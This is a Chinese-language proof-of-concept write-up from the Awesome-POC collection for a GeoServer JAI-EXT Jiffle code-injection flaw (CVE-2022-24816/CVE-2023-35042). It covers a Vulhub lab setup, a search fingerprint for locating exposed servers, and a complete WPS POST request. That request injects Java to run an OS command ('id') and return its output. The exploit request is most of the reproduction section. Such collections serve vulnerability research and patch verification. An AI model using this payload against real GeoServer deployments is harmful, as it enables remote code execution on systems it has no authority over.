admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-07 20:06:03 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/中间件漏洞/GeoServer JAI-EXT 导致远程代码注入漏洞 CVE-2022-24816 CVE-2023-35042.md
Threekiii 39f4429d51 update CVE-2022-24816/CVE-2023-35042
2025-02-07 17:45:01 +08:00

100 lines
4.9 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# GeoServer JAI-EXT 导致远程代码注入漏洞 CVE-2022-24816/CVE-2023-35042
## 漏洞描述
GeoServer 是 OpenGIS Web 服务器规范的 J2EE 实现,利用 GeoServer 可以方便的发布地图数据,允许用户对特征数据进行更新、删除、插入操作。
GeoServer 使用 JAI-EXT 提供的 Jiffle 地图代数语言,这让使用者可以高效地在大图像上执行地图查询。在 JAI-EXT 1.2.21 及更早版本中存在一个代码注入漏洞CVE-2022-24816该漏洞允许攻击者通过精心构造的 Jiffle 调用来执行远程代码。
在 GeoServer 中,这个漏洞也被称为 [CVE-2023-35042](https://osgeo-org.atlassian.net/browse/GEOS-10458)。GeoServer 2.20.4、2.19.6 和 2.18.6 及更高版本通过将 JAI-EXT 依赖项更新到 1.2.22 修复了这个问题。
参考链接:
- https://www.synacktiv.com/publications/exploiting-cve-2022-24816-a-code-injection-in-the-jt-jiffle-extension-of-geoserver
- https://github.com/geosolutions-it/jai-ext/security/advisories/GHSA-v92f-jx6p-73rx
- https://geoserver.org/vulnerability/2022/04/11/geoserver-2-jiffle-jndi-rce.html
- https://osgeo-org.atlassian.net/browse/GEOS-10458
- https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2022/CVE-2022-24816.yaml
## 漏洞影响
```
GeoServer jal-ext <= 1.2.21
```
## 网络测绘
```
app="GeoServer"
```
## 环境搭建
Vulhub 执行如下命令启动一个 GeoServer 2.17.2 服务器:
```
docker compose up -d
```
服务启动后,你可以在 `http://your-ip:8080/geoserver` 查看到 GeoServer 的默认页面。
![](images/GeoServer%20JAI-EXT%20导致远程代码注入漏洞%20CVE-2022-24816%20CVE-2023-35042/image-20250207170607522.png)
## 漏洞复现
漏洞存在于 WMS 接口中。攻击者可以通过向 `/geoserver/wms` 发送特制的请求来执行任意 Java 代码。请求中需要包含一个恶意的 Jiffle 表达式,这个表达式将被服务器执行。
```
<wps:LiteralData>dest = y() - (500); // */ public class Double { public static double NaN = 0; static { try { java.io.BufferedReader reader = new java.io.BufferedReader(new java.io.InputStreamReader(java.lang.Runtime.getRuntime().exec("id").getInputStream())); String line = null; String allLines = " - "; while ((line = reader.readLine()) != null) { allLines += line; } throw new RuntimeException(allLines);} catch (java.io.IOException e) {} }} /**</wps:LiteralData>
```
发送如下请求来复现漏洞:
```
POST /geoserver/wms/ HTTP/1.1
Host: your-ip:8080
Accept-Encoding: gzip, deflate
Content-Type: application/xml
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36
Accept: */*
Content-Length: 44
<?xml version="1.0" encoding="UTF-8"?>
<wps:Execute version="1.0.0" service="WPS" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://www.opengis.net/wps/1.0.0" xmlns:wfs="http://www.opengis.net/wfs" xmlns:wps="http://www.opengis.net/wps/1.0.0" xmlns:ows="http://www.opengis.net/ows/1.1" xmlns:gml="http://www.opengis.net/gml" xmlns:ogc="http://www.opengis.net/ogc" xmlns:wcs="http://www.opengis.net/wcs/1.1.1" xmlns:xlink="http://www.w3.org/1999/xlink" xsi:schemaLocation="http://www.opengis.net/wps/1.0.0 http://schemas.opengis.net/wps/1.0.0/wpsAll.xsd">
<ows:Identifier>ras:Jiffle</ows:Identifier>
<wps:DataInputs>
<wps:Input>
<ows:Identifier>coverage</ows:Identifier>
<wps:Data>
<wps:ComplexData mimeType="application/arcgrid"><![CDATA[ncols 720 nrows 360 xllcorner -180 yllcorner -90 cellsize 0.5 NODATA_value -9999 316]]></wps:ComplexData>
</wps:Data>
</wps:Input>
<wps:Input>
<ows:Identifier>script</ows:Identifier>
<wps:Data>
<wps:LiteralData>dest = y() - (500); // */ public class Double { public static double NaN = 0; static { try { java.io.BufferedReader reader = new java.io.BufferedReader(new java.io.InputStreamReader(java.lang.Runtime.getRuntime().exec("id").getInputStream())); String line = null; String allLines = " - "; while ((line = reader.readLine()) != null) { allLines += line; } throw new RuntimeException(allLines);} catch (java.io.IOException e) {} }} /**</wps:LiteralData>
</wps:Data>
</wps:Input>
<wps:Input>
<ows:Identifier>outputType</ows:Identifier>
<wps:Data>
<wps:LiteralData>DOUBLE</wps:LiteralData>
</wps:Data>
</wps:Input>
</wps:DataInputs>
<wps:ResponseForm>
<wps:RawDataOutput mimeType="image/tiff">
<ows:Identifier>result</ows:Identifier>
</wps:RawDataOutput>
</wps:ResponseForm>
</wps:Execute>
```
这样,数据包中的 Jiffle 表达式中的 Java 代码将被服务器执行,执行结果将返回在 `java.lang.ExceptionInInitializerError` 消息中:
![](images/GeoServer%20JAI-EXT%20导致远程代码注入漏洞%20CVE-2022-24816%20CVE-2023-35042/image-20250207170955999.png)
## 漏洞修复
GeoServer 2.20.4、2.19.6 和 2.18.6 及更高版本通过将 JAI-EXT 依赖项更新到 1.2.22 修复该漏洞。
Reference in New Issue View Git Blame Copy Permalink